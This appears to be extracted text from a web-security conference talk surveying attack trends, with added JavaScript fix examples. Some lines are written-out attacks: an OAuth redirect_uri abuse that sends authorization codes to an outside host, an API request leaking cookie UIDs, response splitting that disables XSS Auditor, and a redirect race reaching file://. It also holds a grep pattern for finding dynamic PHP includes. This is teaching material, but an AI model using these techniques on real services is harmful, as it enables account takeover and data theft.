their code more secure
• At the same time, new products and technologies are often released without a careful security audit
• Old software is often considered safe and trustworthy, but contains severe vulnerabilities
• Business logic bugs are alive
and it inherits global trends
• The global trend is the wide spread of various gadgets and mobile devices
• The global trend is making houses and vehicles smart
• The global trend is making web interfaces rich and self-contained in the browser
at BlackHat archives. If we filter those which are connected with web security and rank the topics, we get the following scoreboard of trends:
• client-side && mobile
• clouds && big data && social networks
• misc && classic
• TLS && SSL
• IoT && routers
• PRNG && SSRF && etc
• old soft
loads of papers on client-side security
• Loads of bug bounties are paid for XSS or something like that
• There are a lot of tricky techniques, and we can see a long war between browser developers and XSS hunters
• Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases the impact of XSS
SECURITY ANALYSIS MADE EASY WITH JSPRIME
MILLION BROWSER BOTNET
PIXEL PERFECT TIMING ATTACKS WITH HTML5
ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS
CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY
THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT
CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING
REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR
REVISITING XSS SANITIZATION
SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS
SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS
TWO FACTOR FAILURE
THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES
JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY
UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED
ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD
Browser extensions hacking
• Endless security features vs. bypass war
• XSS Auditor, CSP, HttpOnly, SOP, CORS
• Funny things like RFD (reflected file download)
• OAuth bugs
but in most cases it can be bypassed, or at least the attack can be modified
• The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets
• There are plenty of bypasses, take a look at:
http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/
http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/
https://www.blackhat.com/docs/us-14/materials/us-14-Johns-Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side-XSS-Filtering.pdf
with plugins
• Look at this typographic plugin for Drupal:
var result = Typographus_Lite_UTF8.typo_text( $(this).text() );
$(this).after(result).remove();
• The jQuery method after() is insecure here: text() returns the HTML-decoded contents of the div, and after() re-inserts the typographer's result as HTML, so all your reflected or stored <script> stuff becomes active
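To make the round trip concrete, here is an added example (not the Drupal plugin's or jQuery's code) that models it without a DOM: typoText is a constructed stand-in for Typographus_Lite_UTF8.typo_text, and each render function returns the string that the slide's code would hand to after().

```javascript
// Added example: why the .text() -> typographer -> .after() round trip
// re-activates markup. No DOM needed: each render function returns the
// HTML string that the slide's code would pass to $(this).after().

// Escape only the characters that can open markup; quotes are left alone so
// the typographer can still find them (they are harmless in text content).
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Constructed stand-in for Typographus_Lite_UTF8.typo_text: like the real
// plugin it emits HTML entities, which is why its output is inserted as HTML.
function typoText(s) {
  return s.replace(/"([^"]*)"/g, '&laquo;$1&raquo;').replace(/ - /g, '&nbsp;&ndash; ');
}

// The slide's pattern: $(this).text() already returned the DECODED content
// (server-escaped "&lt;script&gt;" comes back as "<script>"), and .after()
// parses the result as HTML again, executing any script it finds.
function renderVulnerable(decodedText) {
  return typoText(decodedText);
}

// Hardened variant: re-escape the decoded text before typographing, so
// user-controlled characters stay inert while the typographer's own
// entities are still rendered by the browser.
function renderSafe(decodedText) {
  return typoText(escapeHtml(decodedText));
}

// Constructed sample: what a stored comment reads back as via .text()
const SAMPLE = 'He said "hi" - <script>alert(1)</script>';

function demo() {
  return { vulnerable: renderVulnerable(SAMPLE), safe: renderSafe(SAMPLE) };
}
```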
to the lack of redirect_uri validation:
https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&scope=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257
After authorization it redirects to:
http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85458d0db1c65792d52c8bef3c4407374b2
• The access token (code) value is enough for account takeover
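An added example (not the affected site's code) of the check the authorization endpoint was missing: a prefix comparison accepts a host like *.ru.incsecurity.ru for a client registered at *.ru, while an exact comparison of scheme, host and path rejects it. The client id and hostnames are constructed placeholders, and the userinfo case goes beyond the slide.

```javascript
// Added example: redirect_uri validation at an OAuth authorization endpoint.
// Registered redirect URIs per client_id (constructed placeholders).
const REGISTERED_REDIRECTS = {
  'client-123': ['https://app.example.ru/oauth/callback'],
};

function parseOrNull(u) {
  try { return new URL(u); } catch (e) { return null; }
}

// Weak check seen in practice: "does redirect_uri start with our origin?"
// 'https://app.example.ru.attacker.example/' passes, because the attacker's
// hostname merely begins with the registered one (the slide's case).
function redirectAllowedWeak(clientId, redirectUri) {
  const registered = REGISTERED_REDIRECTS[clientId] || [];
  return registered.some(r => redirectUri.startsWith(new URL(r).origin));
}

// Strict check: parse the candidate, require https, forbid userinfo, query
// and fragment, and compare host(:port) + path with a registered entry.
function redirectAllowedStrict(clientId, redirectUri) {
  const c = parseOrNull(redirectUri);
  if (!c || c.protocol !== 'https:') return false;
  if (c.username || c.password || c.search || c.hash) return false;
  return (REGISTERED_REDIRECTS[clientId] || []).some(r => {
    const reg = new URL(r);
    return reg.host === c.host && reg.pathname === c.pathname;
  });
}
```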
technologies
• Cloud computing and machine learning are heavily used for different purposes
• As for infosec, they can be used both for attack and defense
• Social networks and big data providers can be exploited for deanonymization and fraud
• Machine learning can be used for building a WAF
SOCIAL BOTS ON TWITTER
USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER
WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS
BIG DATA FOR WEB APPLICATION SECURITY
FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFIC
PIVOTING IN AMAZON CLOUDS
BRINGING A MACHETE TO THE AMAZON
BABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALE
SECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORING
BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS
HADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANT
HOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS
bit tricky – you don't exactly know which node will process your request
• Nodes can often be enumerated via HTTP response headers or cookies
• Sometimes some nodes are not updated and contain vulnerabilities
• This creates mind-blowing phantom vulnerabilities =)
• Take a look at the cool talk about Amazon EC2 post-exploitation: https://www.blackhat.com/docs/us-14/materials/us-14-Riancho-Pivoting-In-Amazon-Clouds.pdf
However, their data can sometimes be stolen and used for deanonymisation or fraud. This is a documented API request:
https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=http://incsecurity.ru/?adv_id=$UID
• $UID will be replaced with the actual cookie value by the server and sent to the attacker's host
• Information about the user can be obtained via JSONP hijacking, even if the session id is checked.
continue previous research and bug reports
• They improve exploitation of classical vulnerabilities like SQL injection, and testing/analysis methods
• The rise of the penetration testing industry pushed up demand for .NET and J2EE application hacking methods
AND OBFUSCATION TECHNIQUES’)%00
INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA
CONTEMPORARY AUTOMATIC PROGRAM ANALYSIS
FINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG IMPLEMENTATIONS
I KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS
WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS!
SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS
of the RCE vulnerability in Zeus C&C, which I published around 2010. I opened these links now:
http://ahack.ru/bugs/zeus-vulnerability-exploit.htm
https://github.com/Visgean/Zeus/
• Guess what I have been seeing there for 5 years? ;)
critical vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code?
• The paper on contemporary automatic program analysis is mostly about grep =)
• Personally I use grep with lovely regular expressions:
\w*(include|require)(_once)?[\s\(]+(?!\s*('[^']*'|"[^"]*"|)[@\s\.]*(urlencode|rand|rawurlencode|basename|levenshtein|doubleval|sizeof|base64_encode|strlen|floor|crypt|strrpos|filter_input|abs|bin2hex|bindec|hash|intval|max|decbin|strpos|crc32|ord|md5|count|sha1|min|pathinfo|floatval|round|hexdec)\s*\()[^;]*\$.*
(matches an include/require whose argument contains a variable and is neither a plain string literal nor wrapped in one of the listed functions)
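To run the pattern over source without grep, here is an added example (not the author's tooling) that applies the same regular expression to a constructed PHP snippet; the regex is reconstructed from the slide with the line-break damage repaired and, as an assumption, its `| )` read as an empty alternative. The suppressed basename() line shows what the negative lookahead does.

```javascript
// Added example: the slide's grep pattern as a JavaScript RegExp, applied to
// constructed PHP source. Only includes whose argument contains a variable
// and is NOT wrapped in one of these "safe" functions get flagged.
const SAFE_WRAPPERS = [
  'urlencode', 'rand', 'rawurlencode', 'basename', 'levenshtein', 'doubleval',
  'sizeof', 'base64_encode', 'strlen', 'floor', 'crypt', 'strrpos',
  'filter_input', 'abs', 'bin2hex', 'bindec', 'hash', 'intval', 'max', 'decbin',
  'strpos', 'crc32', 'ord', 'md5', 'count', 'sha1', 'min', 'pathinfo',
  'floatval', 'round', 'hexdec',
].join('|');

// (?!...) is a negative lookahead: bail out when the argument is a bare
// string literal or starts with a call to one of the wrappers above.
// Assumption: the slide's "| )" is an empty alternative, i.e. "|)".
const DYNAMIC_INCLUDE = new RegExp(
  String.raw`\w*(include|require)(_once)?[\s\(]+` +
  String.raw`(?!\s*('[^']*'|"[^"]*"|)[@\s\.]*(${SAFE_WRAPPERS})\s*\()` +
  String.raw`[^;]*\$.*`
);

// Returns the 1-based line number and text of every flagged line.
function findDynamicIncludes(phpSource) {
  const hits = [];
  phpSource.split('\n').forEach((line, i) => {
    if (DYNAMIC_INCLUDE.test(line)) hits.push({ line: i + 1, text: line.trim() });
  });
  return hits;
}

// Constructed PHP snippet (not from any real project).
const SAMPLE_PHP = [
  '<?php',
  "include 'config.php';",                            // 2: literal, ok
  "require_once dirname(__FILE__) . '/lib/db.php';", // 3: no variable, ok
  "include $_GET['page'] . '.php';",                  // 4: flagged
  'require("modules/" . $module . ".php");',         // 5: flagged
  "include basename($_GET['tpl']) . '.tpl.php';",    // 6: wrapper, suppressed
  "$f = $_POST['f']; include($f);",                   // 7: flagged
].join('\n');
```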
PHP and Apache are still broken
• Several UAF vulnerabilities in PHP were fixed recently; still, a lot of restriction bypasses and RCE vulnerabilities live deep in there
• Apache has not yet learnt the RFCs
• Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP
There are still a lot of misconfiguration issues with HTTPS
• Also there are a lot of scary words like BEAST, CRIME, BREACH, Heartbleed, POODLE, SSLStrip and others
• Many configuration mistakes are the result of a trade-off between performance and security
BREACH BEYOND CRIME
TLS 'SECRETS'
TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS
A PERFECT CRIME? ONLY TIME WILL TELL
THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP
BYPASSING HTTP STRICT TRANSPORT SECURITY
popular new IT trends everyone has heard about
• New means untested. Untested means vulnerable
• Seriously, the Internet of Things is broken, and many yell about it
• People hack the RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc
HACKER HOME INVASION V2.0 - ATTACKING NETWORK-CONTROLLED HARDWARE
A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES
ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS
OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS
HTTP response splitting check?
• As you could see in the screenshot above, response splitting kills XSS Auditor, because we can inject the header X-XSS-Protection: 0.
address of the mail server
• The Ev.owa interface with the cPfdDC parameter can be used to send some LDAP requests and connect to different hosts ("domain controllers"):
Microsoft.Exchange.Data.Directory.SuitabilityVerifier.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential)
• If there were a bypass for the anti-CSRF canary, you could possibly steal NTLM credentials
remote URL (class_upload.php, class_vurl.php)
• First it checks the file size via a HEAD request, then it downloads the file
• You can use an HTTP multiplexor to exploit the race condition: return code 200 and a valid file size for the first request, and a 302 redirect for the second request
• Some configuration options and old versions of cURL allow the file:// URL wrapper in the Location header
and widely used software in 2014
• Heartbleed, GHOST, ShellShock, POODLE, goto fail, etc
• Probably it's an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere
consider any part of the software as trusted. Each component of the system can be broken
• BTW, newspapermen also started the era of nicknames for vulnerabilities
• I find this a bit ridiculous but funny =)